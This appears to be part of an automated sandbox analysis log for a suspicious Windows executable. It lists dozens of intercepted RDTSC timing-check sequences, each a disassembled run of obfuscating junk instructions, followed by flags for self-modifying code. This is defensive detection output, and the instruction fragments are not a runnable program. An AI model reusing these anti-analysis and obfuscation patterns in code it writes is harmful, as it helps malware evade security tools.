Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757040B second address: 7570411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570411 second address: 75704DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 pushfd 0x00000011 jmp 00007F1C28FAFD78h 0x00000016 xor ecx, 77334AD8h 0x0000001c jmp 00007F1C28FAFD6Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebx, ecx 0x00000025 popad 0x00000026 je 00007F1C98BFEFB5h 0x0000002c jmp 00007F1C28FAFD72h 0x00000031 sub eax, eax 0x00000033 pushad 0x00000034 call 00007F1C28FAFD77h 0x00000039 mov edi, esi 0x0000003b pop ecx 0x0000003c call 00007F1C28FAFD75h 0x00000041 pushfd 0x00000042 jmp 00007F1C28FAFD70h 0x00000047 sub si, B9F8h 0x0000004c jmp 00007F1C28FAFD6Bh 0x00000051 popfd 0x00000052 pop ecx 0x00000053 popad 0x00000054 mov dword ptr [esi], edi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F1C28FAFD72h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75704DD second address: 75704E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75704E3 second address: 75704E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75704E7 second address: 7570503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570503 second address: 7570507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570507 second address: 757050D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757050D second address: 7570513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570513 second address: 7570517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570517 second address: 757052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 push edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757052B second address: 7570548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570548 second address: 757056F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007F1C28FAFD6Dh 0x00000010 mov eax, dword ptr [ebx+4Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, di 0x00000019 mov edx, 2D9E599Ah 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757056F second address: 7570575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570575 second address: 7570579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570579 second address: 75705AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edx, ax 0x00000011 pushfd 0x00000012 jmp 00007F1C29045F0Ch 0x00000017 jmp 00007F1C29045F15h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705AE second address: 75705B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705B4 second address: 75705C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705C3 second address: 75705E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov edx, 4F0870B2h 0x0000000a popad 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1C28FAFD74h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75705E7 second address: 7570634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 59B2D274h 0x00000008 call 00007F1C29045F0Dh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 jmp 00007F1C29045F17h 0x00000019 mov dword ptr [esi+18h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1C29045F15h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570634 second address: 757069D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 67FF2EA0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+58h] 0x00000010 pushad 0x00000011 movsx edi, cx 0x00000014 popad 0x00000015 mov dword ptr [esi+1Ch], eax 0x00000018 pushad 0x00000019 mov ecx, edx 0x0000001b push ebx 0x0000001c mov eax, 733703E7h 0x00000021 pop esi 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+5Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1C28FAFD74h 0x0000002f and ecx, 67898B48h 0x00000035 jmp 00007F1C28FAFD6Bh 0x0000003a popfd 0x0000003b jmp 00007F1C28FAFD78h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757069D second address: 75706A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75706A3 second address: 757070F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1C28FAFD6Ch 0x00000015 xor cl, 00000008h 0x00000018 jmp 00007F1C28FAFD6Bh 0x0000001d popfd 0x0000001e call 00007F1C28FAFD78h 0x00000023 mov edx, ecx 0x00000025 pop esi 0x00000026 popad 0x00000027 mov eax, dword ptr [ebx+60h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F1C28FAFD78h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757070F second address: 7570760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+24h], eax 0x0000000e jmp 00007F1C29045F14h 0x00000013 mov eax, dword ptr [ebx+64h] 0x00000016 jmp 00007F1C29045F10h 0x0000001b mov dword ptr [esi+28h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1C29045F17h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570760 second address: 7570778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C28FAFD74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570778 second address: 757084D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e jmp 00007F1C29045F16h 0x00000013 mov dword ptr [esi+2Ch], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F1C29045F18h 0x00000020 xor si, 20A8h 0x00000025 jmp 00007F1C29045F0Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push ecx 0x0000002d movsx ebx, ax 0x00000030 pop esi 0x00000031 popad 0x00000032 mov ax, word ptr [ebx+6Ch] 0x00000036 jmp 00007F1C29045F17h 0x0000003b mov word ptr [esi+30h], ax 0x0000003f pushad 0x00000040 movzx ecx, di 0x00000043 push ebx 0x00000044 call 00007F1C29045F0Ch 0x00000049 pop esi 0x0000004a pop edx 0x0000004b popad 0x0000004c mov ax, word ptr [ebx+00000088h] 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F1C29045F13h 0x0000005c adc cx, 20AEh 0x00000061 jmp 00007F1C29045F19h 0x00000066 popfd 0x00000067 push esi 0x00000068 pop ebx 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757084D second address: 7570852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570852 second address: 757088F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, C63Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 pushfd 0x00000015 jmp 00007F1C29045F18h 0x0000001a sub ch, FFFFFF88h 0x0000001d jmp 00007F1C29045F0Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757088F second address: 7570906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1C28FAFD72h 0x00000009 add ax, 1EE8h 0x0000000e jmp 00007F1C28FAFD6Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+0000008Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1C28FAFD6Bh 0x00000024 and ch, 0000002Eh 0x00000027 jmp 00007F1C28FAFD79h 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi+34h], eax 0x00000031 jmp 00007F1C28FAFD6Eh 0x00000036 mov eax, dword ptr [ebx+18h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push edx 0x0000003f pop esi 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570906 second address: 7570974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 48h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007F1C29045F12h 0x00000013 or al, 00000038h 0x00000016 jmp 00007F1C29045F0Bh 0x0000001b popfd 0x0000001c pop esi 0x0000001d mov dh, E0h 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+1Ch] 0x00000023 pushad 0x00000024 movsx ebx, si 0x00000027 popad 0x00000028 mov dword ptr [esi+3Ch], eax 0x0000002b jmp 00007F1C29045F14h 0x00000030 mov eax, dword ptr [ebx+20h] 0x00000033 jmp 00007F1C29045F10h 0x00000038 mov dword ptr [esi+40h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570974 second address: 7570978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570978 second address: 757097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757097E second address: 75709A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709A2 second address: 75709BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709BF second address: 75709CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C28FAFD6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709CF second address: 75709E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edx, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709E9 second address: 75709EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709EF second address: 75709F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75709F3 second address: 7570A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, 1853h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570AF3 second address: 7570B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F1C98C94AC0h 0x0000000f jmp 00007F1C29045F10h 0x00000014 mov eax, dword ptr [ebp-0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F1C29045F0Dh 0x00000020 and si, E9B6h 0x00000025 jmp 00007F1C29045F11h 0x0000002a popfd 0x0000002b mov ax, 2BA7h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570B4F second address: 7570B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1C28FAFD73h 0x00000015 and esi, 1B2CD79Eh 0x0000001b jmp 00007F1C28FAFD79h 0x00000020 popfd 0x00000021 mov ax, 5767h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570B9F second address: 7570BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BA5 second address: 7570BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BA9 second address: 7570BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BBA second address: 7570BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BBE second address: 7570BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BDA second address: 7570BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570BE0 second address: 7570BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530363 second address: 7530398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F1C991B1E20h 0x0000000f pushad 0x00000010 mov ecx, 24803A5Dh 0x00000015 mov si, 1F59h 0x00000019 popad 0x0000001a pop edi 0x0000001b pushad 0x0000001c mov cx, 6091h 0x00000020 popad 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530398 second address: 75303AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303AC second address: 75303DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007F1C28FAFD6Dh 0x0000000b or al, 00000006h 0x0000000e jmp 00007F1C28FAFD71h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303DE second address: 75303E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303E2 second address: 75303F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75303F5 second address: 753041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov dx, 2016h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esp, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1C29045F18h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 753041D second address: 7530422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7530422 second address: 7530432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ebx, esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 756082B second address: 7560862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007F1C28FAFD6Ah 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007F1C28FAFD6Eh 0x00000015 mov dword ptr [esp], ebp 0x00000018 pushad 0x00000019 mov eax, 05B4273Dh 0x0000001e mov bl, cl 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov ax, dx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508C6 second address: 75508CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508CC second address: 75508D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508D0 second address: 75508F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F1C29045F10h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508F2 second address: 75508F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508F6 second address: 75508FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75508FC second address: 755090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C28FAFD6Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 755090B second address: 7550964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1C29045F13h 0x00000016 sub eax, 611855DEh 0x0000001c jmp 00007F1C29045F19h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A3D second address: 7560A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A41 second address: 7560A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A47 second address: 7560A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A4D second address: 7560A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A51 second address: 7560A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A55 second address: 7560A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A64 second address: 7560A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A6A second address: 7560A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A70 second address: 7560A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7560A74 second address: 7560A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Special instruction interceptor: First address: F0B85E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Special instruction interceptor: First address: F0B7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Special instruction interceptor: First address: 10AB98F instructions caused by: Self-modifying code
